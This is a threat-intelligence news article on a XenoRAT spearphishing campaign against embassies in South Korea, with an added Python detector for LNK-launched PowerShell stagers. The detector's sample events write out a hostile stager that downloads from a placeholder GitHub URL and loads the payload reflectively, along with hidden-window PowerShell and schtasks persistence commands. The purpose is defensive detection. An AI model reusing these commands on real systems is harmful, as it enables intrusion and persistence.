A state-sponsored espionage operation is targeting foreign embassies in South Korea to deploy the XenoRAT malware from malicious GitHub repositories, according to researchers from Trellix.
The campaign, which Trellix says has been running since March and has launched at least 19 spearphishing attacks against high-value targets, shows infrastructure and techniques that align with the North Korean actor Kimsuky (APT43). However, some indicators point to a China-based operator, Trellix said.
The operation unfolds in three phases, each with distinct email lures from March through July. In March, initial probing targeted a Central European embassy; by May, the threat actor shifted to more complex diplomatic lures. In one May 13 email, a Western European embassy was targeted with a message from a supposed EU delegation official about a Political Advisory Meeting.
From June to July, the attackers pivoted to themes related to the U.S.-Korea military alliance. Throughout, the campaign relied on highly contextual, multilingual lures written in Korean, English, Persian, Arabic, French and Russian. The messages were often timed to coincide with real-world events and were sent under the names of impersonated diplomats.
Delivery followed a consistent pattern: password-protected ZIP archives hosted on Dropbox, Google Drive or Daum storage services. Linking to an archive rather than attaching it, and encrypting it so that gateway scanners cannot open it, helped the messages get past some email defenses. Each ZIP contained an LNK file disguised as a PDF; when the victim opens it, the shortcut runs obfuscated PowerShell that fetches the XenoRAT payload from GitHub or Dropbox and establishes persistence through scheduled tasks.
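The chain above (explorer.exe launching a hidden, encoded PowerShell command from a double-clicked LNK, a download from a GitHub or Dropbox host, then schtasks.exe for persistence) is easy to express as a process-tree detection. The following Python is an added example, not code from Trellix or from the report; it runs over constructed Sysmon-style process-creation records embedded inline, and the stager script, URL and host list it uses are placeholders chosen for illustration, not indicators from the campaign.

```python
import base64
import re

# Cloud hosts the article names as payload locations. The concrete list is an
# assumption for this example; Trellix did not publish a host list here.
STAGING_HOSTS = {
    "github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
    "dropbox.com", "www.dropbox.com", "dl.dropboxusercontent.com",
}

# Hypothetical stager used to build the sample event below. The URL is a
# placeholder, not an IOC. -EncodedCommand takes base64 of UTF-16LE text.
STAGER = ("$u='https://raw.githubusercontent.com/example-org/example-repo/main/x.dat';"
          "$b=(New-Object Net.WebClient).DownloadData($u);"
          "[Reflection.Assembly]::Load($b)")
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()

# Constructed Sysmon Event ID 1 style records (pid, parent pid, image, command line).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1004, "image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\explorer.exe"'},
    {"pid": 5208, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -EncodedCommand " + ENC},
    {"pid": 5320, "ppid": 5208, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc minute /mo 5 /tn "Update" '
                '/tr "powershell.exe -w hidden -File C:\\Users\\Public\\u.ps1" /f'},
    {"pid": 6001, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind an -EncodedCommand style flag, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def staging_hosts_in(text):
    """Hosts referenced in the text that belong to the cloud staging services."""
    return sorted({h.lower() for h in URL_RE.findall(text) if h.lower() in STAGING_HOSTS})


def process_name(image):
    return image.rsplit("\\", 1)[-1].lower()


def find_stager_chains(events):
    """Flag PowerShell spawned by explorer.exe (how a double-clicked LNK shows up
    in process telemetry) that hides its window or encodes its command, pulls
    from a staging host, and/or registers a scheduled task as a child process."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    findings = []
    for e in events:
        if process_name(e["image"]) not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or process_name(parent["image"]) != "explorer.exe":
            continue
        cmd = e["cmdline"]
        script = decode_encoded_command(cmd)
        hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I) is not None
        hosts = staging_hosts_in(script or cmd)
        persistence = any(
            process_name(c["image"]) == "schtasks.exe" and "/create" in c["cmdline"].lower()
            for c in children.get(e["pid"], [])
        )
        score = sum([script is not None, hidden, bool(hosts), persistence])
        if score >= 2:  # two independent signals: explorer->hidden PowerShell alone is common
            findings.append({"pid": e["pid"], "decoded": script, "hidden": hidden,
                             "staging_hosts": hosts, "persistence": persistence,
                             "score": score})
    return findings


if __name__ == "__main__":
    for f in find_stager_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: score {f['score']} hosts={f['staging_hosts']} "
              f"persistence={f['persistence']}\n  decoded: {f['decoded']}")
```

The threshold of two signals is deliberate: an explorer.exe to powershell.exe edge by itself fires on every administrator's shortcut, while the combination of an encoded command, a hidden window, a cloud staging host and a schtasks.exe child is specific to this kind of LNK stager. Decoding the command line before matching matters because the URL and the reflective load never appear in the raw -EncodedCommand argument.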
XenoRAT itself is a capable trojan that can log keystrokes, capture screenshots, access the webcam and microphone, transfer files and provide a remote shell. Trellix noted that the .NET payload is loaded directly into memory via reflection, which avoids dropping a standalone executable to disk, and that it is obfuscated with Confuser Core 1.6.0; both aid stealth on compromised machines.
Attribution remains uncertain. Trellix describes the campaign as consistent with APT43 (Kimsuky) at medium confidence, citing the use of Korean email services, GitHub-based C2 infrastructure and a unique GUID and mutex previously linked to Kimsuky. At the same time, the operators' working-hour patterns and holiday pauses align with a China-based operator, which Trellix reads as pointing to Chinese sponsorship or involvement.